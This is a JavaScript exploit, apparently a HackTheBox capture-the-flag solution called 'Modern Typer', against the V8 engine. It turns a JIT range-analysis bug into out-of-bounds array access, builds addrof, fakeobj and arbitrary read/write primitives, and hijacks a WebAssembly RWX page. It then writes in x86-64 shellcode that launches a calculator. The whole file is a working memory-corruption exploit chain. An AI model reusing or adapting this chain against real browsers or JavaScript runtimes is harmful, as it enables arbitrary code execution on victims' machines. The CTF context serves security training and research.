Modern Typer - HackTheBox
// One 8-byte buffer viewed both as a double and as two 32-bit words, so the
// two helpers below can reinterpret bit patterns without copying.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

// Return the raw bit pattern of the double `val` as a BigInt.
//   size == 32 -> low 32 bits only; size == 64 -> all 64 bits.
// Any other `size` returns undefined (the buffer is still written).
function ftoi(val, size) {
  f64_buf[0] = val;
  const low = BigInt(u64_buf[0]);
  if (size == 64) {
    const high = BigInt(u64_buf[1]);
    return low + (high << 32n);
  }
  if (size == 32) {
    return low;
  }
  return undefined;
}

// Build a double from the BigInt bit pattern `val`.
//   size == 32 -> only the low word is replaced; the high word keeps whatever
//                 the buffer last held. size == 64 -> both words are replaced.
// Any other `size` leaves the buffer untouched and returns its current double.
function itof(val, size) {
  const is64 = size == 64;
  if (is64) {
    u64_buf[1] = Number(val >> 32n);
  }
  if (is64 || size == 32) {
    u64_buf[0] = Number(val & 0xffffffffn);
  }
  return f64_buf[0];
}
// Builds a small array through a chain of Math.abs/Math.max/negation steps;
// the inline range comments are the author's tracking of the value range the
// optimizing compiler is presumed to infer at each step. Statement order is
// load-bearing — do not reorder, fold or simplify the arithmetic.
//   cond: false gives x = NaN, true gives x = -Infinity.
// Returns [array, 1337].
function trigger(cond) {
  let x = NaN;
  if(cond)
    x = -Infinity;
  var value = Math.abs(x);
  value = Math.max(value, 0x100); // [0x100, inf]
  value = -value; // [-inf, -0x100]
  value = Math.max(value, -0x101); // [-0x101, -0x100]
  value = -value; // [0x100, 0x101]
  value -= 0x100; // [0x2, 0x3]
  value >>= 1; // NaN >> 1 = 0
  value += 10;
  var array = Array(value); // length taken from the computed value above
  array[0] = 1.1;
  return [array, 1337];
}
// Warm-up: call trigger 10001 times with cond=true before the single
// cond=false call below (presumably so the function gets optimized first).
for (let round = 0; round < 10001; round++) trigger(true);
var aux_obj = {"a": 1}
// The one cond=false call after the warm-up loop; only the array is kept.
var corr_array = trigger(false)[0];
// Neighbouring arrays whose headers the reads/writes below reach.
var aux_obj_arr = [aux_obj];
var aux_float_arr = [1.1, 2.2, 3.3];
// Indices 0x0f and 0x18 are well past the array's nominal length, i.e. they
// read adjacent heap memory; both offsets are specific to this build's layout.
var obj_arr_map = ftoi(corr_array[0x0f], 64) >> 32n; // upper 32 bits of the word
var flt_arr_map = ftoi(corr_array[0x18], 32);        // lower 32 bits of the word
console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
console.log("[+] Float array map: 0x" + flt_arr_map.toString(16));
// Return the 64-bit word stored for `obj` in aux_obj_arr[0]: the word at
// corr_array[0x0f] is temporarily replaced with flt_arr_map so the element
// reads back as a double, then restored to obj_arr_map.
// Leaves aux_obj_arr[0] pointing at `obj`.
function addrof(obj) {
  aux_obj_arr[0] = obj;
  corr_array[0x0f] = itof(flt_arr_map << 32n, 64);
  let addr = aux_obj_arr[0];
  corr_array[0x0f] = itof(obj_arr_map << 32n, 64); // restore
  return ftoi(addr, 64);
}
// Return whatever object results from treating the bits `addr` as an
// element of aux_float_arr: the word at corr_array[0x18] has its low half
// swapped for obj_arr_map (high half preserved), the element is read back,
// and the original word is restored.
function fakeobj(addr) {
  let backup = ftoi(corr_array[0x18], 64);
  let tmp_mem = (backup & 0xffffffff00000000n) + obj_arr_map; // keep high half
  aux_float_arr[0] = itof(addr, 64);
  corr_array[0x18] = itof(tmp_mem, 64);
  let fake = aux_float_arr[0];
  corr_array[0x18] = itof(backup, 64); // restore
  return fake;
}
// Helper array: element 0 holds the float-array map bits, element 1 is
// rewritten by arb_read/arb_write below. Only the low 32 bits of its
// address are kept.
var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3];
var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;
console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16));
// Read a 64-bit word at `addr`: a fake object is built at rw_helper+0x20,
// rw_helper[1] is set to a word with 0x8 in the high half and addr-8 in the
// low half, and element 0 of the fake is returned as bits.
// Offsets 0x20 and -0x8 are specific to this build's object layout.
function arb_read(addr) {
  let fake = fakeobj(rw_helper_addr + 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  return ftoi(fake[0], 64);
}
// Write the 64-bit word `value` at `addr`; mirrors arb_read but stores into
// element 0 of the fake instead of reading it. Same build-specific offsets.
function arb_write(addr, value) {
  let fake = fakeobj(rw_helper_addr + 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  fake[0] = itof(value, 64);
}
// Minimal WebAssembly module given as raw bytes; the byte string contains the
// export names "memory" and "main".
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
  130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
  128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
  128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
  0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
var wasm_module = new WebAssembly.Module(wasmCode);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var pwn = wasm_instance.exports.main;
var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn; // low 32 bits only
var rwx = arb_read(wasm_instance_addr + 0x68n); // offset 0x68 is build-specific
console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16));
console.log("[+] RWX section address: 0x" + rwx.toString(16));
// 0x100-byte buffer plus a DataView over it; the word at arr_buf+0x14 is
// read (logged as the backing-store pointer) and then overwritten with rwx.
// Offset 0x14 is specific to this build's layout.
var arr_buf = new ArrayBuffer(0x100);
var dataview = new DataView(arr_buf);
var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;; // stray ';' is harmless
var back_store_addr = arb_read(arr_buf_addr + 0x14n);
console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16));
console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));
arb_write(arr_buf_addr + 0x14n, rwx);
// Opaque 32-bit machine-code words (not decoded here); each is written
// little-endian at offset 4*i into arr_buf through the DataView.
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
  0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
  0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
for (let i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4 * i, shellcode[i], true);
}
// Final step: call the wasm module's exported main (bound to `pwn` above).
console.log("[+] Spawning a calculator...");
pwn();